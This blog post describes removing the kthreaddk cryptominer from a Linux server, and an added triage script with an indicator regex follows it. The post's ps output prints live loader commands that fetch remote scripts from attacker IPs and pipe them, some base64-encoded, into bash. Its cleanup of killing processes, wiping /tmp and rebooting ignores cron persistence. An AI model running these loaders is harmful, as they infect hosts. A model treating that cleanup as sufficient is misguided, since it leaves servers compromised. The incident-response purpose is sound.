
Dealing with the kthreaddk cryptomining malware

Posted: 2023-11-29 11:25:18

Problem description

I noticed that the server's CPU and memory usage was extremely high, and on inspection found several abnormal processes:


  PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND
12043 root      20   0 2443988   2.3g      4 S 100.3 15.1   9:12.96 dbused
13556 root      20   0 2441068   2.3g   1408 S  99.7 15.1   5:05.31 kthreaddk

Then I ran ps again, filtering for command lines containing a URL:

ps -ef

[root@serve1 ~]# ps -ef |grep http://
root      6262  6261  0 Jan06 ?        00:00:00 sh -c export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin; (curl -s http://185.106.94.146/xms || wget -q -O - http://185.106.94.146/xms || lwp-download http://185.106.94.146/xms /tmp/xms) | bash -sh; bash /tmp/xms; rm -rf /tmp/xms
root      6476 11610  0 Jan23 ?        00:00:00 /bin/bash -c (curl -s http://185.106.94.146/xms?cron || wget -q -O - http://185.106.94.146/xms?cron || lwp-download http:/185.106.94.146/xms /tmp/xms) | bash -sh; bash /tmp/xms; rm -rf /tmp/xms; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTA2Ljk0LjE0Ni9kLnB5IikucmVhZCgpKScgfHwgcHl0aG9uMiAtYyAnaW1wb3J0IHVybGxpYjtleGVjKHVybGxpYi51cmxvcGVuKCJodHRwOi8vMTg1LjEwNi45NC4xNDYvZC5weSIpLnJlYWQoKSkn | base64 -d | bash -; echo <base64 blob elided> | base64 -d | bash -
root      8570  8569  0 Jan06 ?        00:00:00 sh -c export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin; (curl -s http://185.106.94.146/xms || wget -q -O - http://185.106.94.146/xms || lwp-download http://185.106.94.146/xms /tmp/xms) | bash -sh; bash /tmp/xms; rm -rf /tmp/xms
root     14491 14121  0 09:22 pts/0    00:00:00 grep --color=auto http://
root     15581 11610  0 Jan22 ?        00:00:00 /bin/bash -c (curl -s http://185.106.94.146/xms?cron || wget -q -O - http://185.106.94.146/xms?cron || lwp-download http:/185.106.94.146/xms /tmp/xms) | bash -sh; bash /tmp/xms; rm -rf /tmp/xms; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTA2Ljk0LjE0Ni9kLnB5IikucmVhZCgpKScgfHwgcHl0aG9uMiAtYyAnaW1wb3J0IHVybGxpYjtleGVjKHVybGxpYi51cmxvcGVuKCJodHRwOi8vMTg1LjEwNi45NC4xNDYvZC5weSIpLnJlYWQoKSkn | base64 -d | bash -; echo <base64 blob elided> | base64 -d | bash -
root     16484 16467  0 Jan02 ?        00:00:00 bash /tmp/.dat http://194.38.23.170/bashirc.x86_64
root     19015 11610  0 Jan26 ?        00:00:00 /bin/bash -c (curl -s http://185.106.94.146/xms?cron || wget -q -O - http://185.106.94.146/xms?cron || lwp-download http:/185.106.94.146/xms /tmp/xms) | bash -sh; bash /tmp/xms; rm -rf /tmp/xms; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTA2Ljk0LjE0Ni9kLnB5IikucmVhZCgpKScgfHwgcHl0aG9uMiAtYyAnaW1wb3J0IHVybGxpYjtleGVjKHVybGxpYi51cmxvcGVuKCJodHRwOi8vMTg1LjEwNi45NC4xNDYvZC5weSIpLnJlYWQoKSkn | base64 -d | bash -; echo <base64 blob elided> | base64 -d | bash -
root     19230 19017  0 Jan26 ?        00:00:00 curl -k http://dw.bpdeliver.ru/x86_64 -o /tmp/dbused
root     22662 11610  0 Jan26 ?        00:00:00 /bin/bash -c (curl -s http://185.106.94.146/xms?cron || wget -q -O - http://185.106.94.146/xms?cron || lwp-download http:/185.106.94.146/xms /tmp/xms) | bash -sh; bash /tmp/xms; rm -rf /tmp/xms; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTA2Ljk0LjE0Ni9kLnB5IikucmVhZCgpKScgfHwgcHl0aG9uMiAtYyAnaW1wb3J0IHVybGxpYjtleGVjKHVybGxpYi51cmxvcGVuKCJodHRwOi8vMTg1LjEwNi45NC4xNDYvZC5weSIpLnJlYWQoKSkn | base64 -d | bash -; echo <base64 blob elided> | base64 -d | bash -
root     22735 11610  0 Jan26 ?        00:00:00 /bin/bash -c (curl -s http://185.106.94.146/xms?cron || wget -q -O - http://185.106.94.146/xms?cron || lwp-download http:/185.106.94.146/xms /tmp/xms) | bash -sh; bash /tmp/xms; rm -rf /tmp/xms; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTA2Ljk0LjE0Ni9kLnB5IikucmVhZCgpKScgfHwgcHl0aG9uMiAtYyAnaW1wb3J0IHVybGxpYjtleGVjKHVybGxpYi51cmxvcGVuKCJodHRwOi8vMTg1LjEwNi45NC4xNDYvZC5weSIpLnJlYWQoKSkn | base64 -d | bash -; echo <base64 blob elided> | base64 -d | bash -
root     24207 11610  0  2022 ?        00:00:00 /bin/bash -c (curl -s http://194.38.23.170/xms || wget -q -O - http://194.38.23.170/xms || lwp-download http://194.38.23.170/xms /tmp/xms) | bash -sh; bash /tmp/xms; rm -rf /tmp/xms; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xOTQuMzguMjMuMTcwL2QucHkiKS5yZWFkKCkpJw== | base64 -d | bash -; echo <base64 blob elided> | base64 -d | bash -
root     28928  2920  0 Feb16 ?        00:00:00 /bin/bash -c (curl -s http://185.106.94.146/xms?cron || wget -q -O - http://185.106.94.146/xms?cron || lwp-download http:/185.106.94.146/xms /tmp/xms) | bash -sh; bash /tmp/xms; rm -rf /tmp/xms; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTA2Ljk0LjE0Ni9kLnB5IikucmVhZCgpKScgfHwgcHl0aG9uMiAtYyAnaW1wb3J0IHVybGxpYjtleGVjKHVybGxpYi51cmxvcGVuKCJodHRwOi8vMTg1LjEwNi45NC4xNDYvZC5weSIpLnJlYWQoKSkn | base64 -d | bash -; echo <base64 blob elided> | base64 -d | bash -

The server had clearly been thoroughly compromised.

Solution

First, kill the processes:

kill -9 12043 12203 12202 12047 12048 12049
pkill -f kthreaddk

Delete the temporary files:

rm -rf /tmp/*
rm -rf /var/tmp/*

Then reboot the machine:

reboot

After that the system was back to normal.
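As an added example that is not part of the original post, the following script runs the same checks over a ps -ef listing and over crontab text, using the hosts, paths and process names from the listing above as indicators; it also reports the parent PIDs of the flagged processes, which the kill step above leaves untouched. The sample listing, its PIDs, dates and base64 string are constructed.

```sh
#!/bin/sh
# Added triage helper, not part of the original post. It flags process and cron
# entries that carry the indicators seen in this incident and reports the
# parent PIDs, so the spawner (PPID 11610 in the post's listing) is inspected
# before the children are killed; killing the miner alone lets cron re-fetch it.
IOC_PATTERN='185\.106\.94\.146|194\.38\.23\.170|dw\.bpdeliver\.ru|/tmp/xms|/tmp/\.dat|/tmp/dbused|kthreaddk|base64 -d [|] bash'

# Read a `ps -ef` listing on stdin; print "PID PPID FIRST-INDICATOR" per hit.
flag_processes() {
    grep -E "$IOC_PATTERN" |
    while read -r _uid pid ppid _c _stime _tty _time cmd; do
        ioc=$(printf '%s\n' "$cmd" | grep -oE "$IOC_PATTERN" | head -n 1)
        printf '%s %s %s\n' "$pid" "$ppid" "$ioc"
    done
}

# Distinct parent PIDs of the flagged processes: inspect these before killing.
suspect_parents() {
    flag_processes | awk '{ print $2 }' | sort -un
}

# Read crontab text on stdin (crontab -l, /etc/crontab, /etc/cron.d/*) and
# print the active entries that reference an indicator; the "xms?cron" URL in
# the listing shows the loader is re-fetched from a scheduled job.
flag_cron_lines() {
    grep -E "$IOC_PATTERN" | awk '!/^[[:space:]]*#/'
}

# Constructed sample in `ps -ef` layout, modelled on the post's output; PIDs,
# dates and the base64 string (it decodes to "echo hi") are made up.
sample_ps() {
cat <<'EOF'
UID        PID  PPID  C STIME TTY          TIME CMD
root         1     0  0 Jan01 ?        00:00:03 /usr/lib/systemd/systemd
root      6262  6261  0 Jan06 ?        00:00:00 sh -c (curl -s http://185.106.94.146/xms || wget -q -O - http://185.106.94.146/xms) | bash -sh; bash /tmp/xms
root     13556 11610  0 Jan23 ?        00:00:00 /bin/bash -c curl -s http://185.106.94.146/xms?cron | bash -sh; echo ZWNobyBoaQ== | base64 -d | bash -
root     16484 16467  0 Jan02 ?        00:00:00 bash /tmp/.dat http://194.38.23.170/bashirc.x86_64
root     19230 19017  0 Jan26 ?        00:00:00 curl -k http://dw.bpdeliver.ru/x86_64 -o /tmp/dbused
root     22662 11610  0 Jan26 ?        00:00:00 kthreaddk
root     14491 14121  0 09:22 pts/0    00:00:00 grep --color=auto http://
EOF
}

# On a live host: ps -ef | flag_processes ; crontab -l | flag_cron_lines
sample_ps | flag_processes
sample_ps | suspect_parents
```

On a live host, pipe `ps -ef` and the crontab sources into the functions; a parent that is cron or a still-running loader has to be removed first, otherwise the miner can come back after the reboot.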

From: https://www.cnblogs.com/dowhere/p/17864171.html
